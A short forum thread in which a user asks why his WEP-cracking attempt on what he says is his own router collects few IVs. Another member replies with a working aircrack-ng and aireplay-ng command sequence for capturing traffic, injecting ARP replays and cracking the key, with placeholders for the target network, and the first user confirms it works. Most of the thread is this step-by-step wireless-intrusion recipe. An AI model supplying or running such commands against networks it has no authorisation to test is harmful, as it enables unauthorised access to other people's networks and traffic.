-
Junior Member
aircrack-ng 1 IV
Hi Guys
I am very new to all this and haveing some big problems when trying to crack the wep on my router.
I am using the following and get 50000 + packets but only around 350 IVs.
Please can someone help me.
I am using a sony vaio VGN-A117s with a netgear WAG511 card BT3 live CD.
Is there a reason I am not getting a good amount of IV's ? I am close to the AP so getting a good signal.
Here are the commands I am using
airmon-ng stop ath0
airmon-ng start wifi0 7
aireplay-ng -1 0 -e strongbow -a 00:11:50:e1:91:8b -h 00:14:6c:5e:1f:8b ath0
aireplay-ng -5 -b 00:11:50:e1:91:8b -h 00:14:6c:5e:1f:8b ath0
packetforge-ng -0 -a 00:11:50:e1:91:8b -h 00:14:6c:5e:1f:8b -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0219-143355.xor -w arp-request
airodump-ng -c 1 --bssid 00:11:50:e1:91:8b -w wep ath0
aireplay-ng -2 -r arp-request ath0
aircrack-ng -P 2 -b 00:11:50:e1:91:8b wep-01.cap
Cheers Pyros
-
here is some help
Hey Pyros this is what code i use and it works fine i got a NETGEAR WG511t
code:
wlanconfig ath1 create wlandev wifi0 wlanmode monitor
airodump-ng -c 6 -w wep -i ath1
aireplay-ng -1 0 -e (ESSID OF TARGET) -a (TARGET MAC ADDRESS) -h (YOUR MAC ADDRESS) ath1
aireplay-ng -3 -b (TARGET MAC ADDRESS) -h (YOUR MAC ADDRESS) ath1
aircrack-ng -a 1 -0 -n 128 wep-01.ivs
-
Junior Member
Hi Leng110
Thanks for the info
Works a charm.
Cheers
Pyros
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules